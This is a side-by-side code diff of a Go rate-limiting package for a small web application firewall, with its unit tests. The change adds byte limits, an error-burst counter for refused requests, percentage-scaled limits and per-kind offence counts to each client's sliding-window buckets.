func TestRequestsAddsUpTheClientsInsideTheNetblock(t *testing.T) { func TestRequestsAddsUpTheClientsInsideTheNetblock(t *testing.T) {
t.Parallel() t.Parallel()
limiter := ratelimit.New(ratelimit.Limits{}) limiter := ratelimit.New(ratelimit.Limits{}, tableSize)
for client, requests := range map[string]int{ for client, requests := range map[string]int{
"198.51.100.9/32": 2, "198.51.100.9/32": 2,
+228 -67
View File
@@ -1,9 +1,10 @@
// Package ratelimit keeps the table of clients: each client's requests // Package ratelimit keeps the table of clients: each client's requests
// counted over a minute, an hour and a day, as the "Counting method" // and bytes counted over a minute, an hour and a day, as the "Counting
// section of SPEC.md describes, which tell when a request takes the client // method" section of SPEC.md describes, which tell when a request takes
// over a rate limit, and each client's history since it was first seen. // the client over a rate limit or a byte limit, and each client's history
// At most 20,000 clients are kept, in memory, and written to clients.json // since it was first seen. At most SWWAF_MAX_TRACKED_CLIENTS clients are
// and read from it by the state package. // kept, in memory, and written to clients.json and read from it by the
// state package.
package ratelimit package ratelimit
import ( import (
@@ -16,26 +17,35 @@ import (
"github.com/hashicorp/golang-lru/v2/simplelru" "github.com/hashicorp/golang-lru/v2/simplelru"
) )
// maxClients is how many clients are kept. Past it, the least recently
// seen client is dropped, with its history, and starts afresh if it comes
// back.
const maxClients = 20000
const day = 24 * time.Hour const day = 24 * time.Hour
// The kinds of limits, as the metrics name them.
const (
// KindRequests is a rate limit, on a client's requests.
KindRequests = "requests"
// KindBytes is a byte limit, on a client's bytes.
KindBytes = "bytes"
// KindRefusals is the error burst, on a client's requests smallwebwaf
// refused after a rule file match or for a missing or wrong token.
KindRefusals = "refusals"
)
// Limits are the most requests a client may make in a minute, an hour and // Limits are the most requests a client may make in a minute, an hour and
// a day. Zero is no limit. // a day, and the most bytes. Zero is no limit.
type Limits struct { type Limits struct {
PerMinute int64 PerMinute int64
PerHour int64 PerHour int64
PerDay int64 PerDay int64
BytesPerMinute int64
BytesPerHour int64
BytesPerDay int64
} }
// Limiter counts each client's requests against the limits, and keeps // Limiter counts each client's requests and bytes against the limits, and
// its history. It is safe for concurrent use. // keeps its history. It is safe for concurrent use.
type Limiter struct { type Limiter struct {
// windows are the minute, the hour and the day, in the order of // windows are the minute, the hour and the day, in the order of
// Client.buckets. // Client.buckets and Client.byteBuckets.
windows [3]window windows [3]window
mu sync.Mutex mu sync.Mutex
@@ -43,17 +53,25 @@ type Limiter struct {
} }
// Client is a client in the table, as clients.json holds it: its buckets // Client is a client in the table, as clients.json holds it: its buckets
// in each window, and its history. // of requests and of bytes in each window, its buckets of refusals in the
// minute, which the error burst counts, and its history.
//
//nolint:tagliatelle // the state files use snake_case, as the request log does
type Client struct { type Client struct {
Client netip.Prefix `json:"client"` Client netip.Prefix `json:"client"`
Minute Buckets `json:"minute"` Minute Buckets `json:"minute"`
Hour Buckets `json:"hour"` Hour Buckets `json:"hour"`
Day Buckets `json:"day"` Day Buckets `json:"day"`
MinuteBytes Buckets `json:"minute_bytes"`
HourBytes Buckets `json:"hour_bytes"`
DayBytes Buckets `json:"day_bytes"`
MinuteRefusals Buckets `json:"minute_refusals"`
History History `json:"history"` History History `json:"history"`
} }
// Buckets are a client's two buckets in one window: the requests in the // Buckets are a client's two buckets in one window: the requests, or the
// bucket under way, which began at Start, and in the bucket before it. // bytes, in the bucket under way, which began at Start, and in the bucket
// before it.
type Buckets struct { type Buckets struct {
Start time.Time `json:"start"` Start time.Time `json:"start"`
Current int64 `json:"current"` Current int64 `json:"current"`
@@ -100,9 +118,19 @@ type Responses struct {
} }
// Offences are a client's offences, by kind. // Offences are a client's offences, by kind.
//
//nolint:tagliatelle // the state files use snake_case, as the request log does
type Offences struct { type Offences struct {
// Limit is its requests that broke a rate limit. // Limit is its requests that broke a rate limit, a byte limit or the
// error burst, Attack those that were a clear sign of attack, a match
// of a ban rule or a request for a trap path, RuleBlocked those a block
// rule refused, WAFBlocked those the Core Rule Set refused, and
// TokenRefused those refused for a missing or wrong token.
Limit int64 `json:"limit"` Limit int64 `json:"limit"`
Attack int64 `json:"attack"`
RuleBlocked int64 `json:"rule_blocked"`
WAFBlocked int64 `json:"waf_blocked"`
TokenRefused int64 `json:"token_refused"`
} }
// Request is what a client's history keeps of one of its requests. // Request is what a client's history keeps of one of its requests.
@@ -119,12 +147,23 @@ type Request struct {
// and of its response. // and of its response.
RequestBytes int64 RequestBytes int64
ResponseBytes int64 ResponseBytes int64
// BrokeLimit is true for a request that broke a rate limit. // BrokeLimit is true for a request that broke a rate limit, a byte
// limit or the error burst, Attack for one that matched a ban rule or
// asked for a trap path, RuleBlocked for one a block rule refused,
// WAFBlocked for one the Core Rule Set refused, and TokenRefused for
// one refused for a missing or wrong token.
BrokeLimit bool BrokeLimit bool
Attack bool
RuleBlocked bool
WAFBlocked bool
TokenRefused bool
} }
// New returns a Limiter for limits, with no client counted yet. // New returns a Limiter for limits, with no client counted yet, whose
func New(limits Limits) *Limiter { // table holds at most maxClients clients (SWWAF_MAX_TRACKED_CLIENTS). Past
// it, the least recently seen client is dropped, with its history, and
// starts afresh if it comes back.
func New(limits Limits, maxClients int) *Limiter {
clients, err := simplelru.NewLRU[netip.Prefix, *Client](maxClients, nil) clients, err := simplelru.NewLRU[netip.Prefix, *Client](maxClients, nil)
if err != nil { if err != nil {
panic(err) // NewLRU fails only for a size below one panic(err) // NewLRU fails only for a size below one
@@ -132,62 +171,92 @@ func New(limits Limits) *Limiter {
return &Limiter{ return &Limiter{
windows: [3]window{ windows: [3]window{
{name: "minute", length: time.Minute, limit: limits.PerMinute}, {
{name: "hour", length: time.Hour, limit: limits.PerHour}, name: "minute", length: time.Minute,
{name: "day", length: day, limit: limits.PerDay}, limit: limits.PerMinute, byteLimit: limits.BytesPerMinute,
},
{
name: "hour", length: time.Hour,
limit: limits.PerHour, byteLimit: limits.BytesPerHour,
},
{
name: "day", length: day,
limit: limits.PerDay, byteLimit: limits.BytesPerDay,
},
}, },
clients: clients, clients: clients,
} }
} }
// Hit is a request that takes a client over a rate limit. // Hit is a request that takes a client over a rate limit or the error
// burst, or whose bytes take it over a byte limit.
type Hit struct { type Hit struct {
// Kind is KindRequests for a rate limit, KindBytes for a byte limit,
// KindRefusals for the error burst.
Kind string
// Window is "minute", "hour" or "day". // Window is "minute", "hour" or "day".
Window string Window string
// Limit is the window's limit. // Limit is the window's limit, as the client's percentage of it.
Limit int64 Limit int64
// Requests is the client's requests counted in the window, this one // Count is the client's requests, bytes or refusals counted in the
// included. // window, this request's included.
Requests float64 Count float64
} }
// Counts are a client's requests in the minute, the hour and the day that // Counts are a client's requests and bytes in the minute, the hour and
// end at a request, that request included. // the day that end at a request, that request's included.
//
//nolint:tagliatelle // SPEC.md's request log names its fields in snake_case
type Counts struct { type Counts struct {
Minute float64 `json:"minute"` Minute float64 `json:"minute"`
Hour float64 `json:"hour"` Hour float64 `json:"hour"`
Day float64 `json:"day"` Day float64 `json:"day"`
MinuteBytes float64 `json:"minute_bytes"`
HourBytes float64 `json:"hour_bytes"`
DayBytes float64 `json:"day_bytes"`
} }
// Count counts a request from client at now, in every window, whether or // Count counts a request from client at now, in every window, whether or
// not it is refused, and returns the client's requests in each window. It // not it is refused, and returns the client's counts in each window. It
// reports whether the request takes the client over a limit, and the // reports whether the request takes the client over a rate limit, of
// window whose limit it goes over, the shortest if it is over several. // which the client gets the percentage percent, rounded down, and the hit:
func (l *Limiter) Count(client netip.Prefix, now time.Time) (Counts, Hit, bool) { // the window whose limit it goes over, the shortest if it is over
// several. A limit that is off stays off.
func (l *Limiter) Count(
client netip.Prefix, now time.Time, percent int64,
) (Counts, Hit, bool) {
return l.count(client, now, 1, 0, percent)
}
// CountBytes counts bytes, those of a request from client that has ended,
// at now, in every window, and returns the client's counts in each window.
// It reports whether the bytes take the client over a byte limit, of which
// the client gets the percentage percent, and the hit, as Count does.
func (l *Limiter) CountBytes(
client netip.Prefix, now time.Time, bytes, percent int64,
) (Counts, Hit, bool) {
return l.count(client, now, 0, bytes, percent)
}
// CountRefusal counts a request from client at now that smallwebwaf
// refused after a rule file or Core Rule Set match or for a missing or
// wrong token, and reports whether the client's refusals in the minute
// that ends at now, this one included, are more than threshold, which
// breaks the error burst, and the hit.
func (l *Limiter) CountRefusal(
client netip.Prefix, now time.Time, threshold int64,
) (Hit, bool) {
l.mu.Lock() l.mu.Lock()
defer l.mu.Unlock() defer l.mu.Unlock()
var ( count := l.get(client).MinuteRefusals.Add(now, time.Minute, 1)
requests [3]float64 hit := Hit{Kind: KindRefusals, Window: "minute", Limit: threshold, Count: count}
hit Hit
)
for i, b := range l.get(client).buckets() { return hit, count > float64(threshold)
w := l.windows[i]
requests[i] = b.add(now, w.length)
if hit.Window == "" && w.limit > 0 && requests[i] > float64(w.limit) {
hit = Hit{Window: w.name, Limit: w.limit, Requests: requests[i]}
}
} }
counts := Counts{Minute: requests[0], Hour: requests[1], Day: requests[2]} // Reset sets client's counts of requests, of bytes and of refusals in
// every window back to zero. Its history keeps its totals.
return counts, hit, hit.Window != ""
}
// Reset sets client's counts in every window back to zero. Its history
// keeps its totals.
func (l *Limiter) Reset(client netip.Prefix) { func (l *Limiter) Reset(client netip.Prefix) {
l.mu.Lock() l.mu.Lock()
defer l.mu.Unlock() defer l.mu.Unlock()
@@ -195,6 +264,8 @@ func (l *Limiter) Reset(client netip.Prefix) {
c, seen := l.clients.Peek(client) c, seen := l.clients.Peek(client)
if seen { if seen {
c.Minute, c.Hour, c.Day = Buckets{}, Buckets{}, Buckets{} c.Minute, c.Hour, c.Day = Buckets{}, Buckets{}, Buckets{}
c.MinuteBytes, c.HourBytes, c.DayBytes = Buckets{}, Buckets{}, Buckets{}
c.MinuteRefusals = Buckets{}
} }
} }
@@ -227,6 +298,22 @@ func (l *Limiter) AddToHistory(client netip.Prefix, now time.Time, r Request) {
if r.BrokeLimit { if r.BrokeLimit {
h.Offences.Limit++ h.Offences.Limit++
} }
if r.Attack {
h.Offences.Attack++
}
if r.RuleBlocked {
h.Offences.RuleBlocked++
}
if r.WAFBlocked {
h.Offences.WAFBlocked++
}
if r.TokenRefused {
h.Offences.TokenRefused++
}
} }
// AddLookup gives client's history its AS number, AS name and country, as // AddLookup gives client's history its AS number, AS name and country, as
@@ -328,19 +415,67 @@ func (l *Limiter) Load(clients []Client, now time.Time) {
l.clients.Purge() l.clients.Purge()
for _, c := range clients { for _, c := range clients {
for i, b := range c.buckets() { for i, w := range l.windows {
// The window that ends at now covers neither bucket once it for _, b := range []*Buckets{c.buckets()[i], c.byteBuckets()[i]} {
// begins after the bucket under way has ended. if b.Passed(now, w.length) {
length := l.windows[i].length
if !now.Add(-length).Before(b.Start.Add(length)) {
*b = Buckets{} *b = Buckets{}
} }
} }
}
if c.MinuteRefusals.Passed(now, time.Minute) {
c.MinuteRefusals = Buckets{}
}
l.clients.Add(c.Client, &c) l.clients.Add(c.Client, &c)
} }
} }
// count adds requests and bytes from client at now to its buckets in
// every window, and returns its counts. A limit is broken only by what is
// added to it, so that a request whose bytes are counted after another of
// the client's requests broke a rate limit does not break it too. The
// client gets the percentage percent of each limit.
func (l *Limiter) count(
client netip.Prefix, now time.Time, requests, bytes, percent int64,
) (Counts, Hit, bool) {
l.mu.Lock()
defer l.mu.Unlock()
c := l.get(client)
requestBuckets, byteBuckets := c.buckets(), c.byteBuckets()
var (
requestCounts, byteCounts [3]float64
hit Hit
)
for i, w := range l.windows {
requestCounts[i] = requestBuckets[i].Add(now, w.length, requests)
byteCounts[i] = byteBuckets[i].Add(now, w.length, bytes)
limit, byteLimit := percentOf(w.limit, percent), percentOf(w.byteLimit, percent)
switch {
case hit.Window != "":
case requests > 0 && w.limit > 0 && requestCounts[i] > float64(limit):
hit = Hit{
Kind: KindRequests, Window: w.name, Limit: limit, Count: requestCounts[i],
}
case bytes > 0 && w.byteLimit > 0 && byteCounts[i] > float64(byteLimit):
hit = Hit{
Kind: KindBytes, Window: w.name, Limit: byteLimit, Count: byteCounts[i],
}
}
}
counts := Counts{
Minute: requestCounts[0], Hour: requestCounts[1], Day: requestCounts[2],
MinuteBytes: byteCounts[0], HourBytes: byteCounts[1], DayBytes: byteCounts[2],
}
return counts, hit, hit.Window != ""
}
// get returns client's entry in the table, a new one if it has none, and // get returns client's entry in the table, a new one if it has none, and
// makes it the most recently seen. // makes it the most recently seen.
func (l *Limiter) get(client netip.Prefix) *Client { func (l *Limiter) get(client netip.Prefix) *Client {
@@ -353,30 +488,48 @@ func (l *Limiter) get(client netip.Prefix) *Client {
return c return c
} }
// buckets returns c's buckets in the minute, the hour and the day. // buckets returns c's buckets of requests in the minute, the hour and the
// day.
func (c *Client) buckets() [3]*Buckets { func (c *Client) buckets() [3]*Buckets {
return [3]*Buckets{&c.Minute, &c.Hour, &c.Day} return [3]*Buckets{&c.Minute, &c.Hour, &c.Day}
} }
// window is a length of time over which requests are counted, and the // byteBuckets returns c's buckets of bytes in the minute, the hour and the
// most requests a client may make in it. // day.
func (c *Client) byteBuckets() [3]*Buckets {
return [3]*Buckets{&c.MinuteBytes, &c.HourBytes, &c.DayBytes}
}
// window is a length of time over which requests and bytes are counted,
// and the most requests and the most bytes a client may have in it.
type window struct { type window struct {
name string name string
length time.Duration length time.Duration
limit int64 limit int64
byteLimit int64
} }
// add counts a request at now in a window of length, and returns the // percentOf returns the percentage percent of limit, rounded down. It is
// client's requests in the window that ends at now: those in the bucket // written as limit's hundreds times percent, plus the rest's share, since
// under way, and those in the bucket before it weighted by how much of // limit*percent can overflow for a byte limit.
// that bucket the window still covers. func percentOf(limit, percent int64) int64 {
const hundred = 100
return limit/hundred*percent + limit%hundred*percent/hundred
}
// Add counts n requests, or n bytes, at now in a window of length, and
// returns the count in the window that ends at now: what is in the bucket
// under way, and what is in the bucket before it weighted by how much of
// that bucket the window still covers. With n zero it counts nothing, and
// returns the count. The anomaly counters count in Buckets too.
// //
// Concurrent requests can be counted out of order, so now can be a moment // Concurrent requests can be counted out of order, so now can be a moment
// before the bucket under way began; such a request is counted in that // before the bucket under way began; such a request is counted in that
// bucket. A request dated more than a second before it means the clock // bucket. A request dated more than a second before it means the clock
// was set back, and the buckets start afresh: otherwise the bucket before // was set back, and the buckets start afresh: otherwise the bucket before
// would keep its full weight until the clock caught up. // would keep its full weight until the clock caught up.
func (b *Buckets) add(now time.Time, length time.Duration) float64 { func (b *Buckets) Add(now time.Time, length time.Duration, n int64) float64 {
if now.Before(b.Start.Add(-time.Second)) { if now.Before(b.Start.Add(-time.Second)) {
*b = Buckets{} *b = Buckets{}
} }
@@ -393,7 +546,7 @@ func (b *Buckets) add(now time.Time, length time.Duration) float64 {
b.Current = 0 b.Current = 0
} }
b.Current++ b.Current += n
elapsed := max(now.Sub(b.Start), 0) elapsed := max(now.Sub(b.Start), 0)
covered := 1 - float64(elapsed)/float64(length) covered := 1 - float64(elapsed)/float64(length)
@@ -401,6 +554,14 @@ func (b *Buckets) add(now time.Time, length time.Duration) float64 {
return float64(b.Previous)*covered + float64(b.Current) return float64(b.Previous)*covered + float64(b.Current)
} }
// Passed reports whether the window of length that ends at now covers
// neither of b's buckets: it begins after the bucket under way has ended.
// What they hold then counts no more, and a state file read at now drops
// it.
func (b *Buckets) Passed(now time.Time, length time.Duration) bool {
return !now.Add(-length).Before(b.Start.Add(length))
}
// add counts a response with status in its class. A status of 0, for // add counts a response with status in its class. A status of 0, for
// nothing sent, is not a response. // nothing sent, is not a response.
func (r *Responses) add(status int) { func (r *Responses) add(status int) {
+248 -17
View File
@@ -1,6 +1,7 @@
package ratelimit_test package ratelimit_test
import ( import (
"math"
"net/netip" "net/netip"
"testing" "testing"
"time" "time"
@@ -11,6 +12,14 @@ import (
// limit is the limit the tests set. // limit is the limit the tests set.
const limit = 3 const limit = 3
// tableSize is the most clients the tests' tables hold, the default of
// SWWAF_MAX_TRACKED_CLIENTS.
const tableSize = 20000
// whole is the percentage of each limit a client gets when nothing lowers
// its limits.
const whole = 100
// The windows, as Count names them. // The windows, as Count names them.
const ( const (
minute = "minute" minute = "minute"
@@ -32,7 +41,7 @@ func TestEachWindowRefusesAtItsLimitAndLetsTheClientBack(t *testing.T) {
t.Run(tc.window, func(t *testing.T) { t.Run(tc.window, func(t *testing.T) {
t.Parallel() t.Parallel()
limiter := ratelimit.New(tc.limits) limiter := ratelimit.New(tc.limits, tableSize)
client := netip.MustParsePrefix("203.0.113.9/32") client := netip.MustParsePrefix("203.0.113.9/32")
start := midnight() start := midnight()
quarter := tc.length / 4 quarter := tc.length / 4
@@ -57,43 +66,244 @@ func TestEachWindowRefusesAtItsLimitAndLetsTheClientBack(t *testing.T) {
func TestHitGivesTheLimitAndTheRequestsCounted(t *testing.T) { func TestHitGivesTheLimitAndTheRequestsCounted(t *testing.T) {
t.Parallel() t.Parallel()
limiter := ratelimit.New(ratelimit.Limits{PerMinute: limit, PerHour: limit}) limiter := ratelimit.New(ratelimit.Limits{PerMinute: limit, PerHour: limit}, tableSize)
client := netip.MustParsePrefix("203.0.113.9/32") client := netip.MustParsePrefix("203.0.113.9/32")
start := midnight() start := midnight()
for range limit { for range limit {
_, _, over := limiter.Count(client, start) _, _, over := limiter.Count(client, start, whole)
if over { if over {
t.Fatal("a request within the limit is over it") t.Fatal("a request within the limit is over it")
} }
} }
// Over both limits; the minute's is named, with the four requests. // Over both limits; the minute's is named, with the four requests.
_, hit, over := limiter.Count(client, start) _, hit, over := limiter.Count(client, start, whole)
want := ratelimit.Hit{Window: minute, Limit: limit, Requests: limit + 1} want := ratelimit.Hit{
Kind: ratelimit.KindRequests, Window: minute, Limit: limit, Count: limit + 1,
}
if !over || hit != want { if !over || hit != want {
t.Errorf("request over the limit gives %+v and %t, want %+v and true", t.Errorf("request over the limit gives %+v and %t, want %+v and true",
hit, over, want) hit, over, want)
} }
} }
func TestClientGetsItsPercentageOfEachLimitRoundedDown(t *testing.T) {
t.Parallel()
limiter := ratelimit.New(ratelimit.Limits{PerMinute: 5, BytesPerDay: math.MaxInt64},
tableSize)
client := netip.MustParsePrefix("203.0.113.9/32")
start := midnight()
// Half of 5 requests is 2.5, rounded down to 2: the third is over.
for range 2 {
_, _, over := limiter.Count(client, start, 50)
if over {
t.Fatal("a request within half the limit is over it")
}
}
_, hit, over := limiter.Count(client, start, 50)
want := ratelimit.Hit{Kind: ratelimit.KindRequests, Window: minute, Limit: 2, Count: 3}
if !over || hit != want {
t.Errorf("the third request gives %+v and %t, want %+v and true", hit, over, want)
}
// Half of the largest byte limit is still far above a TiB: working it
// out does not overflow.
_, hit, over = limiter.CountBytes(client, start, 1<<40, 50)
if over {
t.Errorf("a TiB is over half the largest byte limit: %+v", hit)
}
}
func TestZeroPercentIsAZeroAllowanceAndALimitOffStaysOff(t *testing.T) {
t.Parallel()
// Only the hour has limits: the minute's and the day's are off.
limiter := ratelimit.New(ratelimit.Limits{PerHour: limit, BytesPerHour: 1000},
tableSize)
client := netip.MustParsePrefix("203.0.113.9/32")
start := midnight()
// At 0 percent, the first request and the first byte are over the
// hour's limits, which are 0; the minute's, which are off, stay off.
_, hit, _ := limiter.Count(client, start, 0)
want := ratelimit.Hit{Kind: ratelimit.KindRequests, Window: hour, Limit: 0, Count: 1}
if hit != want {
t.Errorf("the first request gives %+v, want %+v", hit, want)
}
_, hit, _ = limiter.CountBytes(client, start, 1, 0)
want = ratelimit.Hit{Kind: ratelimit.KindBytes, Window: hour, Limit: 0, Count: 1}
if hit != want {
t.Errorf("the first byte gives %+v, want %+v", hit, want)
}
}
func TestEachByteLimitIsBrokenByTheBytesCounted(t *testing.T) {
t.Parallel()
const byteLimit = 1000
for _, tc := range []struct {
window string
limits ratelimit.Limits
}{
{minute, ratelimit.Limits{BytesPerMinute: byteLimit}},
{hour, ratelimit.Limits{BytesPerHour: byteLimit}},
{"day", ratelimit.Limits{BytesPerDay: byteLimit}},
} {
t.Run(tc.window, func(t *testing.T) {
t.Parallel()
limiter := ratelimit.New(tc.limits, tableSize)
client := netip.MustParsePrefix("203.0.113.9/32")
// 600 bytes are within the limit, 600 more over it.
_, _, over := limiter.CountBytes(client, midnight(), 600, whole)
if over {
t.Fatal("600 bytes are over the limit of 1000")
}
_, hit, over := limiter.CountBytes(client, midnight(), 600, whole)
want := ratelimit.Hit{
Kind: ratelimit.KindBytes, Window: tc.window, Limit: byteLimit, Count: 1200,
}
if !over || hit != want {
t.Errorf("1200 bytes give %+v and %t, want %+v and true", hit, over, want)
}
})
}
}
func TestALimitIsBrokenOnlyByWhatIsAddedToIt(t *testing.T) {
t.Parallel()
limiter := ratelimit.New(ratelimit.Limits{PerMinute: 2, BytesPerMinute: 1000},
tableSize)
client := netip.MustParsePrefix("203.0.113.9/32")
other := netip.MustParsePrefix("203.0.113.10/32")
start := midnight()
// The third request breaks the rate limit. The bytes of a request
// counted after it, within the byte limit, do not break it again.
for range 2 {
wantCount(t, limiter, client, start, "")
}
wantCount(t, limiter, client, start, minute)
wantBytesCount(t, limiter, client, start, 500, "")
wantBytesCount(t, limiter, client, start, 600, ratelimit.KindBytes)
// Bytes over the byte limit do not have the next request break it, nor
// the rate limit, which that request is within.
wantBytesCount(t, limiter, other, start, 1200, ratelimit.KindBytes)
wantCount(t, limiter, other, start, "")
}
func TestCountGivesTheBytesInEachWindow(t *testing.T) {
t.Parallel()
limiter := ratelimit.New(ratelimit.Limits{}, tableSize)
client := netip.MustParsePrefix("203.0.113.9/32")
start := midnight()
limiter.CountBytes(client, start, 300, whole)
// A quarter into the next hour, the minute has only these 100 bytes.
// The hour still covers three quarters of the bucket before, whose 300
// bytes count 225, and these: 325. The day covers all 400.
later := start.Add(time.Hour + time.Hour/4)
limiter.CountBytes(client, later, 100, whole)
// A request's counts give the bytes counted so far too.
counts, _, _ := limiter.Count(client, later, whole)
want := ratelimit.Counts{
Minute: 1, Hour: 1, Day: 1, MinuteBytes: 100, HourBytes: 325, DayBytes: 400,
}
if counts != want {
t.Errorf("counts %+v, want %+v", counts, want)
}
}
func TestResetSetsTheBytesBackToZero(t *testing.T) {
t.Parallel()
limiter := ratelimit.New(ratelimit.Limits{BytesPerDay: 1000}, tableSize)
client := netip.MustParsePrefix("203.0.113.9/32")
start := midnight()
wantBytesCount(t, limiter, client, start, 1200, ratelimit.KindBytes)
limiter.Reset(client)
// The client has its whole allowance of bytes again.
wantBytesCount(t, limiter, client, start, 1000, "")
}
func TestRefusalsOverTheThresholdInAMinuteBreakTheErrorBurst(t *testing.T) {
t.Parallel()
limiter := ratelimit.New(ratelimit.Limits{}, tableSize)
client := netip.MustParsePrefix("203.0.113.9/32")
start := midnight()
for range limit {
if _, over := limiter.CountRefusal(client, start, limit); over {
t.Fatalf("a refusal within the threshold of %d broke the error burst", limit)
}
}
hit, over := limiter.CountRefusal(client, start, limit)
want := ratelimit.Hit{
Kind: ratelimit.KindRefusals, Window: minute, Limit: limit, Count: limit + 1,
}
if !over || hit != want {
t.Errorf("one over the threshold broke it: %t, with %+v; want %+v", over, hit,
want)
}
// Half a minute into the next, half of those four still count, 2, and
// this one: 3, within the threshold.
hit, over = limiter.CountRefusal(client, start.Add(time.Minute+time.Minute/2), limit)
if over || hit.Count != 3 {
t.Errorf("half a minute on, %v refusals broke it: %t; want 3, false",
hit.Count, over)
}
// A ban sets them back to zero.
limiter.Reset(client)
hit, _ = limiter.CountRefusal(client, start.Add(time.Minute+time.Minute/2), limit)
if hit.Count != 1 {
t.Errorf("after a reset, %v refusals, want 1", hit.Count)
}
}
func TestCountGivesTheRequestsInEachWindow(t *testing.T) { func TestCountGivesTheRequestsInEachWindow(t *testing.T) {
t.Parallel() t.Parallel()
limiter := ratelimit.New(ratelimit.Limits{}) limiter := ratelimit.New(ratelimit.Limits{}, tableSize)
client := netip.MustParsePrefix("203.0.113.9/32") client := netip.MustParsePrefix("203.0.113.9/32")
start := midnight() start := midnight()
for range 3 { for range 3 {
limiter.Count(client, start) limiter.Count(client, start, whole)
} }
// A quarter into the next hour, the minute has only this request. The // A quarter into the next hour, the minute has only this request. The
// hour still covers three quarters of the bucket before, with its three // hour still covers three quarters of the bucket before, with its three
// requests, which count 2.25, and this one: 3.25. The day covers all // requests, which count 2.25, and this one: 3.25. The day covers all
// four. // four.
counts, _, _ := limiter.Count(client, start.Add(time.Hour+time.Hour/4)) counts, _, _ := limiter.Count(client, start.Add(time.Hour+time.Hour/4), whole)
want := ratelimit.Counts{Minute: 1, Hour: 3.25, Day: 4} want := ratelimit.Counts{Minute: 1, Hour: 3.25, Day: 4}
if counts != want { if counts != want {
@@ -104,7 +314,7 @@ func TestCountGivesTheRequestsInEachWindow(t *testing.T) {
func TestResetSetsTheCountsBackToZero(t *testing.T) { func TestResetSetsTheCountsBackToZero(t *testing.T) {
t.Parallel() t.Parallel()
limiter := ratelimit.New(ratelimit.Limits{PerMinute: limit, PerDay: limit}) limiter := ratelimit.New(ratelimit.Limits{PerMinute: limit, PerDay: limit}, tableSize)
client := netip.MustParsePrefix("203.0.113.9/32") client := netip.MustParsePrefix("203.0.113.9/32")
start := midnight() start := midnight()
@@ -126,7 +336,7 @@ func TestResetSetsTheCountsBackToZero(t *testing.T) {
func TestClientBackAfterAWholeBucketIsWithinTheLimitAtOnce(t *testing.T) { func TestClientBackAfterAWholeBucketIsWithinTheLimitAtOnce(t *testing.T) {
t.Parallel() t.Parallel()
limiter := ratelimit.New(ratelimit.Limits{PerHour: limit}) limiter := ratelimit.New(ratelimit.Limits{PerHour: limit}, tableSize)
client := netip.MustParsePrefix("203.0.113.9/32") client := netip.MustParsePrefix("203.0.113.9/32")
start := midnight() start := midnight()
@@ -145,7 +355,8 @@ func TestClientBackAfterAWholeBucketIsWithinTheLimitAtOnce(t *testing.T) {
func TestRefusedRequestsCount(t *testing.T) { func TestRefusedRequestsCount(t *testing.T) {
t.Parallel() t.Parallel()
limiter := ratelimit.New(ratelimit.Limits{PerMinute: limit, PerHour: 2 * limit}) limiter := ratelimit.New(ratelimit.Limits{PerMinute: limit, PerHour: 2 * limit},
tableSize)
refused := netip.MustParsePrefix("203.0.113.9/32") refused := netip.MustParsePrefix("203.0.113.9/32")
within := netip.MustParsePrefix("203.0.113.10/32") within := netip.MustParsePrefix("203.0.113.10/32")
start := midnight() start := midnight()
@@ -178,7 +389,7 @@ func TestRefusedRequestsCount(t *testing.T) {
func TestRequestCountedLateGoesInTheBucketUnderWay(t *testing.T) { func TestRequestCountedLateGoesInTheBucketUnderWay(t *testing.T) {
t.Parallel() t.Parallel()
limiter := ratelimit.New(ratelimit.Limits{PerMinute: limit}) limiter := ratelimit.New(ratelimit.Limits{PerMinute: limit}, tableSize)
client := netip.MustParsePrefix("203.0.113.9/32") client := netip.MustParsePrefix("203.0.113.9/32")
start := midnight() start := midnight()
@@ -194,7 +405,7 @@ func TestRequestCountedLateGoesInTheBucketUnderWay(t *testing.T) {
func TestClockSetBackStartsTheBucketsAfresh(t *testing.T) { func TestClockSetBackStartsTheBucketsAfresh(t *testing.T) {
t.Parallel() t.Parallel()
limiter := ratelimit.New(ratelimit.Limits{PerHour: limit}) limiter := ratelimit.New(ratelimit.Limits{PerHour: limit}, tableSize)
client := netip.MustParsePrefix("203.0.113.9/32") client := netip.MustParsePrefix("203.0.113.9/32")
start := midnight() start := midnight()
@@ -217,12 +428,12 @@ func TestClockSetBackStartsTheBucketsAfresh(t *testing.T) {
wantCount(t, limiter, client, setBack, hour) wantCount(t, limiter, client, setBack, hour)
} }
func TestKeepsAtMost20000ClientsDroppingTheLeastRecentlySeen(t *testing.T) { func TestKeepsAtMostMaxClientsDroppingTheLeastRecentlySeen(t *testing.T) {
t.Parallel() t.Parallel()
const maxClients = 20000 const maxClients = 3
limiter := ratelimit.New(ratelimit.Limits{PerMinute: 1}) limiter := ratelimit.New(ratelimit.Limits{PerMinute: 1}, maxClients)
now := midnight() now := midnight()
clients := make([]netip.Prefix, maxClients+1) clients := make([]netip.Prefix, maxClients+1)
@@ -244,6 +455,11 @@ func TestKeepsAtMost20000ClientsDroppingTheLeastRecentlySeen(t *testing.T) {
// One client more drops the least recently seen, the second, which // One client more drops the least recently seen, the second, which
// starts afresh, while the first is kept. // starts afresh, while the first is kept.
wantCount(t, limiter, clients[maxClients], now, "") wantCount(t, limiter, clients[maxClients], now, "")
if limiter.Len() != maxClients {
t.Errorf("the table holds %d clients, want %d", limiter.Len(), maxClients)
}
wantCount(t, limiter, clients[1], now, "") wantCount(t, limiter, clients[1], now, "")
wantCount(t, limiter, clients[0], now, minute) wantCount(t, limiter, clients[0], now, minute)
} }
@@ -261,9 +477,24 @@ func wantCount(
) { ) {
t.Helper() t.Helper()
_, hit, _ := limiter.Count(client, now) _, hit, _ := limiter.Count(client, now, whole)
if hit.Window != want { if hit.Window != want {
t.Errorf("request from %s at %s is over %q, want %q", t.Errorf("request from %s at %s is over %q, want %q",
client, now.Format(time.RFC3339), hit.Window, want) client, now.Format(time.RFC3339), hit.Window, want)
} }
} }
// wantBytesCount counts bytes from client at now, and checks the kind of
// the limit they break, "" for none.
func wantBytesCount(
t *testing.T, limiter *ratelimit.Limiter, client netip.Prefix, now time.Time,
bytes int64, want string,
) {
t.Helper()
_, hit, _ := limiter.CountBytes(client, now, bytes, whole)
if hit.Kind != want {
t.Errorf("%d bytes from %s at %s break a limit on %q, want %q",
bytes, client, now.Format(time.RFC3339), hit.Kind, want)
}
}
+29 -15
View File
@@ -14,9 +14,9 @@ func TestSnapshotListsTheClientsByAddress(t *testing.T) {
want := []string{"192.0.2.1/32", "203.0.113.9/32", "203.0.113.10/32", "2001:db8::/64"} want := []string{"192.0.2.1/32", "203.0.113.9/32", "203.0.113.10/32", "2001:db8::/64"}
